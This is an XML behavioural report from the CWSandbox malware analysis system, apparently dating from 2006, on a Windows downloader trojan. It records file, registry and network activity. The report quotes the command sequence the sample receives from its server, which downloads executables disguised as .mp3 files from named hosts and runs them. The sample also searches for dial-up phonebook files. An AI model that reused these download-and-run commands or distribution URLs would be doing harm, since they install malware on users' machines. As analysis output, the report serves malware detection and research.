<?xml version="1.0"?>
<!-- This analysis was created by the CWSandbox (c) Carsten Willems 2006-->
<analysis cwsversion="Beta 1.81" time="27.09.2006 21:02:15" file="2759b3a4dcb3350d5e0ca7af7e2f6396.exe" logpath="c:\analysis\log\2759b3a4dcb3350d5e0ca7af7e2f6396.exe\run_1\">
<calltree>
<process_call filename="c:\analysis\binary\2759b3a4dcb3350d5e0ca7af7e2f6396.exe" starttime="00:00.063" startreason="AnalysisTarget"/>
<process_call filename="services.exe" starttime="00:04.110" startreason="SCM"/>
</calltree>

<processes>
<process index="1" pid="1040" filename="c:\analysis\binary\2759b3a4dcb3350d5e0ca7af7e2f6396.exe" filesize="13480" md5="2759b3a4dcb3350d5e0ca7af7e2f6396" username="foobar" parentindex="0" starttime="00:00.063" terminationtime="00:12.641" startreason="AnalysisTarget" terminationreason="NormalTermination" executionstatus="OK">
<virusscan_section>
<scanner name="ClamAV" application_version="0.88.2" signature_file_version="1948">
<classification>OK</classification>
<additional_info/>
</scanner>
<scanner name="BDC/Linux-Console" application_version="7.0.2492" signature_file_version="456078">
<classification>OK</classification>
<additional_info/>
</scanner>
<scanner name="AntiVir Workstation" application_version="2.1.8-47" signature_file_version="6.36.0.78">
<classification>OK</classification>
<additional_info/>
</scanner>

</virusscan_section>
<com_section>
<com_create_instance inprocserver32="%SystemRoot%\system32\shdocvw.dll" interfaceid="{000214E6-0000-0000-C000-000000000046}"/>
<com_get_class_object inprocserver32="C:\WINDOWS\system32\urlmon.dll" interfaceid="{00000001-0000-0000-C000-000000000046}"/>
</com_section>
<dll_handling_section>
<load_dll dll="c:\analysis\binary\2759b3a4dcb3350d5e0ca7af7e2f6396.exe" successful="1"/>
<load_dll dll="C:\WINDOWS\system32\ntdll.dll" successful="1"/>
<load_dll dll="C:\WINDOWS\system32\kernel32.dll" successful="1"/>
<load_dll dll="C:\WINDOWS\system32\user32.dll" successful="1"/>
<load_dll dll="C:\WINDOWS\system32\GDI32.dll" successful="1"/>
<load_dll dll="C:\WINDOWS\system32\advapi32.dll" successful="1"/>
<load_dll dll="C:\WINDOWS\system32\RPCRT4.dll" successful="1"/>
<load_dll dll="C:\WINDOWS\system32\oleaut32.dll" successful="1"/>
<load_dll dll="C:\WINDOWS\system32\msvcrt.dll" successful="1"/>
<load_dll dll="C:\WINDOWS\system32\ole32.dll" successful="1"/>
<load_dll dll="C:\WINDOWS\system32\comctl32.dll" successful="1"/>
<load_dll dll="C:\WINDOWS\system32\wsock32.dll" successful="1"/>
<load_dll dll="C:\WINDOWS\system32\WS2_32.dll" successful="1"/>
<load_dll dll="C:\WINDOWS\system32\WS2HELP.dll" successful="1"/>
<load_dll dll="C:\WINDOWS\system32\Wship6.dll" successful="1"/>
<load_dll dll="C:\WINDOWS\system32\pstorec.dll" successful="1"/>
<load_dll dll="C:\WINDOWS\system32\ATL.DLL" successful="1"/>
<load_dll dll="C:\WINDOWS\System32\mswsock.dll" successful="1"/>
<load_dll dll="C:\WINDOWS\system32\DNSAPI.dll" successful="1"/>
<load_dll dll="C:\WINDOWS\System32\winrnr.dll" successful="1"/>
<load_dll dll="C:\WINDOWS\system32\WLDAP32.dll" successful="1"/>
<load_dll dll="C:\WINDOWS\system32\Secur32.dll" successful="1"/>
<load_dll dll="comctl32.dll" successful="1"/>
<load_dll dll="urlmon.dll" successful="1"/>
<load_dll dll="WSOCK32.dll" successful="1"/>
<load_dll dll="KERNEL32.dll" successful="1"/>
<load_dll dll="USER32.dll" successful="1"/>
<load_dll dll="GDI32.dll" successful="1"/>
<load_dll dll="ADVAPI32.dll" successful="1"/>
<load_dll dll="SHELL32.dll" successful="1"/>
<load_dll dll="uxtheme.dll" successful="1"/>
<load_dll dll="mlang.dll" successful="1"/>
<load_dll dll="WININET.dll" successful="1"/>
<load_dll dll="WS2_32.dll" successful="1"/>
<load_dll dll="RASAPI32.DLL" successful="1"/>
<load_dll dll="RTUTILS.DLL" successful="1"/>
<load_dll dll="USERENV.dll" successful="1"/>
<load_dll dll="netapi32.dll" successful="1"/>
<load_dll dll="netapi32" successful="1"/>
<load_dll dll="appHelp.dll" successful="1"/>
<load_dll dll="ole32.dll" successful="1"/>
<load_dll dll="RichEd20.dll" successful="1"/>
<load_dll dll="VERSION.dll" successful="1"/>
</dll_handling_section>
<filesystem_section>
<create_open_file filetype="File" srcfile="\Device\RasAcd" creationdistribution="OPEN_ALWAYS" desiredaccess="FILE_ANY_ACCESS,FILE_READ_ACCESS,FILE_READ_DATA,FILE_LIST_DIRECTORY,FILE_WRITE_ACCESS,FILE_WRITE_DATA,FILE_ADD_FILE" shareaccess="SHARE_READ,SHARE_WRITE" flags="FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<open_file filetype="namedpipe" srcfile="\\.\PIPE\lsarpc" creationdistribution="OPEN_EXISTING" desiredaccess="FILE_ANY_ACCESS" shareaccess="SHARE_READ,SHARE_WRITE" flags="SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<get_file_attributes filetype="File" srcfile="c:\autoexec.bat" desiredaccess="FILE_ANY_ACCESS" flags="SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<open_file filetype="File" srcfile="c:\autoexec.bat" creationdistribution="OPEN_EXISTING" desiredaccess="FILE_ANY_ACCESS" shareaccess="SHARE_READ" flags="FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<find_file filetype="File" srcfile="C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Connections\Pbk\*.pbk" desiredaccess="FILE_ANY_ACCESS" flags="SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<find_file filetype="File" srcfile="C:\WINDOWS\system32\Ras\*.pbk" desiredaccess="FILE_ANY_ACCESS" flags="SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<find_file filetype="File" srcfile="C:\Documents and Settings\foobar\Application Data\Microsoft\Network\Connections\Pbk\*.pbk" desiredaccess="FILE_ANY_ACCESS" flags="SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<open_file filetype="File" srcfile="C:\Documents and Settings\foobar\Local Settings\Temporary Internet Files\Content.IE5\A360B5YU\jackjohnson[1].mp3" creationdistribution="OPEN_EXISTING" desiredaccess="FILE_ANY_ACCESS" shareaccess="SHARE_READ,SHARE_WRITE" flags="FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<create_file filetype="File" srcfile="a.exe" creationdistribution="CREATE_ALWAYS" desiredaccess="FILE_ANY_ACCESS" flags="FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<open_file filetype="namedpipe" srcfile="\\.\PIPE\wkssvc" creationdistribution="OPEN_EXISTING" desiredaccess="FILE_ANY_ACCESS" shareaccess="SHARE_READ,SHARE_WRITE" flags="SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<get_file_attributes filetype="File" srcfile="c:\analysis\binary" desiredaccess="FILE_ANY_ACCESS" flags="SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<get_file_attributes filetype="File" srcfile="a.exe" desiredaccess="FILE_ANY_ACCESS" flags="SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<open_file filetype="File" srcfile="C:\WINDOWS\system32\shdocvw.dll" creationdistribution="OPEN_EXISTING" desiredaccess="FILE_ANY_ACCESS,FILE_READ_ATTRIBUTES" shareaccess="SHARE_READ" flags="FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<get_file_attributes filetype="File" srcfile="C:\WINDOWS\Registration" desiredaccess="FILE_ANY_ACCESS" flags="SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<open_file filetype="File" srcfile="C:\WINDOWS\Registration\R000000000014.clb" creationdistribution="OPEN_EXISTING" desiredaccess="FILE_ANY_ACCESS" shareaccess="SHARE_READ" flags="SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<get_file_attributes filetype="File" srcfile="c:\analysis\binary\a.exe" desiredaccess="FILE_ANY_ACCESS" flags="SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<get_file_attributes filetype="File" srcfile="c:\analysis\binary\a.exe:Zone.Identifier" desiredaccess="FILE_ANY_ACCESS" flags="SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<get_file_attributes filetype="File" srcfile="C:\WINDOWS\" desiredaccess="FILE_ANY_ACCESS" flags="SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<open_file filetype="File" srcfile="C:\Documents and Settings\foobar\Local Settings\Temporary Internet Files\Content.IE5\VXZ0R7B8\drsmartload1135a[1].exe" creationdistribution="OPEN_EXISTING" desiredaccess="FILE_ANY_ACCESS" shareaccess="SHARE_READ,SHARE_WRITE" flags="FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<create_file filetype="File" srcfile="drsmartload1135a.exe" creationdistribution="CREATE_ALWAYS" desiredaccess="FILE_ANY_ACCESS" flags="FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<get_file_attributes filetype="File" srcfile="drsmartload1135a.exe" desiredaccess="FILE_ANY_ACCESS" flags="SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<get_file_attributes filetype="File" srcfile="c:\analysis\binary\drsmartload1135a.exe" desiredaccess="FILE_ANY_ACCESS" flags="SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<get_file_attributes filetype="File" srcfile="c:\analysis\binary\drsmartload1135a.exe:Zone.Identifier" desiredaccess="FILE_ANY_ACCESS" flags="SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<get_file_attributes filetype="File" srcfile="Yinstall.exe" desiredaccess="FILE_ANY_ACCESS" flags="SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<get_file_attributes filetype="File" srcfile="c:\analysis\binary\Yinstall.exe" desiredaccess="FILE_ANY_ACCESS" flags="SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<get_file_attributes filetype="File" srcfile="C:\WINDOWS\system32\Yinstall.exe" desiredaccess="FILE_ANY_ACCESS" flags="SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<get_file_attributes filetype="File" srcfile="C:\WINDOWS\System\Yinstall.exe" desiredaccess="FILE_ANY_ACCESS" flags="SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<get_file_attributes filetype="File" srcfile="C:\WINDOWS\Yinstall.exe" desiredaccess="FILE_ANY_ACCESS" flags="SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<get_file_attributes filetype="File" srcfile="C:\WINDOWS\System32\Wbem\Yinstall.exe" desiredaccess="FILE_ANY_ACCESS" flags="SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<get_file_attributes filetype="File" srcfile="C:\Program Files\Support Tools\Yinstall.exe" desiredaccess="FILE_ANY_ACCESS" flags="SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<open_file filetype="File" srcfile="C:\Documents and Settings\foobar\Local Settings\Temporary Internet Files\Content.IE5\R4AWLO0I\mcsh[1].mp3" creationdistribution="OPEN_EXISTING" desiredaccess="FILE_ANY_ACCESS" shareaccess="SHARE_READ,SHARE_WRITE" flags="FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<create_file filetype="File" srcfile="mny.exe" creationdistribution="CREATE_ALWAYS" desiredaccess="FILE_ANY_ACCESS" flags="FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<get_file_attributes filetype="File" srcfile="mny.exe" desiredaccess="FILE_ANY_ACCESS" flags="SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<get_file_attributes filetype="File" srcfile="c:\analysis\binary\mny.exe" desiredaccess="FILE_ANY_ACCESS" flags="SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<get_file_attributes filetype="File" srcfile="c:\analysis\binary\mny.exe:Zone.Identifier" desiredaccess="FILE_ANY_ACCESS" flags="SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
<copy_file filetype="File" srcfile="msnmsgr.exe" dstfile="msgs.exe" desiredaccess="FILE_ANY_ACCESS" flags="SECURITY_ANONYMOUS" fileinformationclass="FileBasicInformation"/>
</filesystem_section>
<mutex_section>
<create_mutex name="ZonesCounterMutex" owned="0"/>
<create_mutex name="ZonesCacheCounterMutex" owned="0"/>
<create_mutex name="ZonesLockedCacheCounterMutex" owned="0"/>
<create_mutex name="RasPbFile" owned="0"/>
</mutex_section>
<registry_section>
<enum_keys key="HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\"/>
<query_value key="HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" subkey_or_value="DisableImprovedZoneCheck"/>
<query_value key="Software\Microsoft\Windows\CurrentVersion\ThemeManager" subkey_or_value="Compositing"/>
<query_value key="Control Panel\Desktop" subkey_or_value="LameButtonText"/>
<query_value key="HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\SecurityService" subkey_or_value="DefaultAuthLevel"/>
<create_open_key key="HKEY_LOCAL_MACHINE\Software\Microsoft\DownloadManager" subkey_or_value="Software\Microsoft\DownloadManager"/>
<query_value key="HKEY_LOCAL_MACHINE\Software\Microsoft\DownloadManager" subkey_or_value="CacheOk"/>
<query_value key="HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings" subkey_or_value="User Agent"/>
<enum_values key="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\UA Tokens"/>
<enum_values key="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Pre Platform"/>
<enum_values key="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform"/>
<query_value key="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" subkey_or_value="IsTextPlainHonored"/>
<query_value key="HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\UrlMon Settings\Registry\MACHINE\System\CurrentControlSet\Control\Session Manager\AppCompatibility" subkey_or_value="DisableAppCompat"/>
<query_value key="HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\UrlMon Settings\Registry\Machine\Software\Classes\CLSID\{871c5380-42a0-1069-a2ea-08002b30309d}\InProcServer32"/>
<query_value key="HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\*\\Registry\Machine\Software\Classes\CLSID\{871c5380-42a0-1069-a2ea-08002b30309d}\InProcServer32"/>
<query_value key="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MSNMSGR.EXE" subkey_or_value="Path"/>
</registry_section>
<process_section>
<create_process filename="a.exe" showwindow="SW_SHOWNORMAL" apifunction="ShellExecuteA" successful="0"/>
<create_process filename="drsmartload1135a.exe" showwindow="SW_SHOWNORMAL" apifunction="ShellExecuteA" successful="0"/>
<create_process filename="Yinstall.exe" showwindow="SW_SHOWNORMAL" apifunction="ShellExecuteA" successful="0"/>
<create_process filename="mny.exe" showwindow="SW_SHOWNORMAL" apifunction="ShellExecuteA" successful="0"/>
</process_section>
<service_section>
<open_scmanager servicename="SCM"/>
<open_service servicename="RASMAN" desiredaccess="SERVICE_ALL_ACCESS"/>
</service_section>
<system_info_section>
<get_computer_name/>
<get_system_directory/>
<get_windows_directory/>
</system_info_section>
<user_section>
<impersonate_user user="foobar" tokenhandle="334444"/>
<impersonate_user user="foobar" tokenhandle="366628"/>
<get_username tokenhandle="0"/>
</user_section>
<window_section>
<enum_window/>
<destroy_window classname="URL Moniker Notification Window"/>
</window_section>
<winsock_section>
<connections_unknown>
<connection connectionestablished="0" socket="0">
<gethostbyname requested_host="go.links4all.biz" resulting_addr="69.25.27.172"/>
</connection>
</connections_unknown>
<connections_udp>
<connection transportprotocol="UDP" connectionestablished="0" socket="270360">
</connection>
<connection transportprotocol="UDP" connectionestablished="0" socket="-1">
</connection>
</connections_udp>
<connections_outgoing>
<connection transportprotocol="TCP" remoteaddr="69.25.27.172" remoteport="80" protocol="HTTP" connectionestablished="1" socket="201572">
<http_data>
<http_cmd method="GET" url="/" http_version="HTTP/1.1"/>
</http_data>
</connection>
<connection transportprotocol="TCP" remoteaddr="69.64.38.140" remoteport="80" protocol="Unknown" connectionestablished="1" socket="201784">
<plain_communication_data>
<recv>down http://www.lollpics.net/jackjohnson.mp3 a.exe;</recv>
<recv>shell a.exe;down http://promo.dollarrevenue.com/webmasterexe/drsmartload1135a.exe drsmartload1135a.exe;shell drsmartload1135a.exe;down http://www.uglyphotos.net/Yinstall.mp3 Yinstall.exe;shell Yinstall.exe;down http://www.lollpics.net/mcsh.mp3 mny.exe;shell mny.exe;</recv>
</plain_communication_data>
</connection>
<connection transportprotocol="TCP" remoteaddr="69.64.36.26" remoteport="80" protocol="HTTP" connectionestablished="1" socket="373176">
<http_data>
<http_cmd method="GET" url="/jackjohnson.mp3" http_version="HTTP/1.1"/>
<http_cmd method="GET" url="/mcsh.mp3" http_version="HTTP/1.1"/>
</http_data>
</connection>
<connection transportprotocol="TCP" remoteaddr="194.187.45.56" remoteport="80" protocol="HTTP" connectionestablished="1" socket="544656">
<http_data>
<http_cmd method="GET" url="/webmasterexe/drsmartload1135a.exe" http_version="HTTP/1.1"/>
</http_data>
</connection>
<connection transportprotocol="TCP" remoteaddr="69.64.36.26" remoteport="80" protocol="HTTP" connectionestablished="1" socket="616928">
<http_data>
<http_cmd method="GET" url="/Yinstall.mp3" http_version="HTTP/1.1"/>
</http_data>
</connection>
</connections_outgoing>
</winsock_section>

</process>
<process index="2" pid="704" filename="services.exe" filesize="-1" username="SYSTEM" parentindex="0" starttime="00:04.110" terminationtime="00:13.703" startreason="SCM" terminationreason="Timeout" executionstatus="OK">
</process>
</processes>
</analysis>